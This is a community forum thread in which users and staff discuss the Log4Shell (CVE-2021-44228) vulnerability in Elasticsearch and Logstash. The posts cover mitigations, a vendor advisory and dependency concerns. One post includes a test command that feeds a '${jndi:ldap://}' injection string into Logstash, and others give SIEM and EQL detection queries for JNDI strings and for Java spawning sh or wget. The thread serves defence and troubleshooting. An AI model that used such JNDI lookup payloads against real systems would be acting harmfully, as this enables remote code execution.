Zero-day-exploit in log4j2 which is part of elasticsearch

Ive added it to that and hoping its correct while waiting for 7.16.1

Working on adding -Dlog4j2.formatMsgNoLookups=true ....

So are we sure this works? What's the impact of adding this?

1 Like

Is there any way to apply the mitigation to a cluster hosted in Elastic Cloud? I cannot find a way to set JVM options in the user interface.

Please report security issues to as per the online instructions

@dadoonet Some official Elastic communication and recommendation about this would be nice. Unauthenticated RCE is not nice..

Still working on adding -Dlog4j2.formatMsgNoLookups=true ....

So are we sure this works? What's the impact of adding this?

Please see Apache Log4j2 Remote Code Execution (RCE) Vulnerability - CVE-2021-44228 - ESA-2021-31.

We will be making more announcements as details become clearer.

I've confirmed -Dlog4j2.formatMsgNoLookups=true doesn't work. What the hell? Why still no patch?

docker run -it logstash:7.14.2 bash
echo '${jndi:ldap://}' | logstash -e 'filter { json { source => "message" } }'

bash-4.2$ tail -1 jvm.options

Logstash {"logstash.version"=>"7.14.2", "jruby.version"=>"jruby (2.5.8) 2021-06-15 55810c552b OpenJDK 64-Bit Server VM 11.0.12+7 on 11.0.12+7 +indy +jit [linux-x86_64]"}

Folks please be aware that this dropped Friday and is it the weekend in most parts of the world. While we are working on a fix and uncovering it's impact on our products, please do respect that we don't work 24/7 :slight_smile:


Further update, please see Apache Log4j2 Remote Code Execution (RCE) Vulnerability - CVE-2021-44228 - ESA-2021-31 as it's been amended with details for each of the products and the impact that this RCE has.

TLDR - Elasticsearch is safe due to the use of the Java security manager.


@warkolm Not trying to question Elastic's findings, but wondering why I see reports and screenshot of hacked Elasticsearch instance while Elastic says:


About a SIEM rule => The following query is defintely useful:

(*jndi\:ldap\:* OR *jndi\:rmi\:* OR *jndi\:ldaps* OR *jndi\:dns*)

The problem is due to the front wildcards, it's a very expensive query

1 Like

@willemdh That's not an Elasticsearch instance, it's the search results on the site.
The behaviour of the search has changed since yesterday, that search now triggers a 406 response.

1 Like

What datasets are needed to get the query:

sequence by with maxspan=1m
 [network where event.action == "connection_attempted" and : "java" and
     outbound connection attempt to 
     LDAP, RMI or DNS standard ports 
     by JAVA process 
  destination.port in (1389, 389, 1099, 53, 5353)] by
 [process where event.type == "start" and 

  /* Suspicious JAVA child process */ : "java" and : ("sh", 
                   "wget")] by

Working? I was hopeing auditbeat process or socket would be enough, but I cannot find event.action == "connection_attempted" there. Maybe Elastic Endpoint Security data required? Can I make this query work only with Auditbeat socket dataset?

Maybe adding network_flow to event.action? But the Auditbeat socket dataset seems to miss

I would have expected a more solid response from Elastic.

It is stated that Logstash is not vulnerable, relying on the up-to-date JDK where LDAP external code loading is disabled. But Logstash also includes SnakeYAML and possibly other libraries that will allow JNDI injection. Just relying on up-to-date JDK seems like a very weak and insecure response to me.

Also see PSA: Log4Shell and the current state of JNDI injection – – Random ramblings, exploits and projects.

You realize you are talking about one of the biggest if not the biggest security issue in Java ever here, which is being actively exploited and much bigger than something like the Equifax data breach?

I'm no Elastic customer, so not in a position to make any demands, but am now also 100% certain I will never be one.

1 Like

I did some digging in and it appears that logstash plugins which depend on older version of logstash-core-plugin-api may also be affected, even when logstash is updated to include log4j v2.15.0.

It appears that logstash-core gem depends on an old vulnerable version of log4j as well - e.g. logstash-core | | your community gem host.

Logstash plugins depend on logstash-core-plugin-api which depends on logstash-core so it's a transitive dependency of the plugin (and as such, gets pulled in when bundling all the dependencies for distribution). A lot of plugins bundle all the dependencies in the gems they push to RubyGems.

It appears that the latest version of logstash-core (logstash-core | | your community gem host) doesn't specify log4j as a dependency anymore (how does that work now? does it just use log4j bundled with logstash core?).

Can someone please double check and confirm my thinking? Thanks.

1 Like

@Kami I think this would make sense in a dedicated thread in the Logstash section; unless you want to report a security issue then it's Security issues | Elastic. But I think you're more after understanding / discussing best practices going forward?
And I assume that Logstash with it's plugin architecture and dependencies will be the most complicated product to "get right". bump log4j version to 2.15.0 (#13494) · elastic/logstash@c12d2f5 · GitHub alone might not be enough.

1 Like

@MikeN123 I don't think that's the full picture: Over 100 people evaluated all potentially vulnerable projects, worked on detection mechanisms, and documented it in Detecting Exploitation of CVE-2021-44228 (log4j2) with Elastic Security | Elastic Blog within 24h. It took some time to get as correct and complete as possible in that timeframe — nobody wants "well actually ..." every 2h.

And we knew that thanks to the Java Security Manager in Elasticsearch this wasn't a remote code execution situation — why should your logging library be allowed to call random URLs after all. The extra work we put into security features have actually paid off.

1 Like

You had 100 people working on this but they couldn’t get a fixed logstash build out? That’s disturbing.

And I was just replying to one of the Elastic people saying “it’s weekend”, what is just not something you should say with an urgent security issue like this.

Also note that this is not about calling random URLs. That is the PoC yes, but other evaluations using other gadgets are possible. That may still be avoided by the (deprecated) SecurityManager, I don’t know, but please don’t think this is only about jndi:ldap.

  1. You underestimate the work to build, test individually, and test in combination all of the artifacts on all the supported platforms an Elastic Stack release requires. 7.16.1 and 6.8.21 are rare emergency releases that will come out shortly. This is getting all the attention that it should.
  2. I'm sorry if that comment came off the wrong way — it doesn't cover all the work that has been going into this behind the scenes.
  3. Yes, it's still an information disclosure issue for Elasticsearch, but there is a mitigation and you should upgrade once available. It's been a bad weekend for everyone, but we're all in this together and need to work work it out : )
  1. Is this a problem on Elastic Cloud (as I understand, it is not) for ES6 and ES7.
  2. Is this a problem on Elastic Cloud for clusters not yet upgraded (ES5)? I could not find any info on this (yes, this week upgrading to ES6-ES7 will be priority...)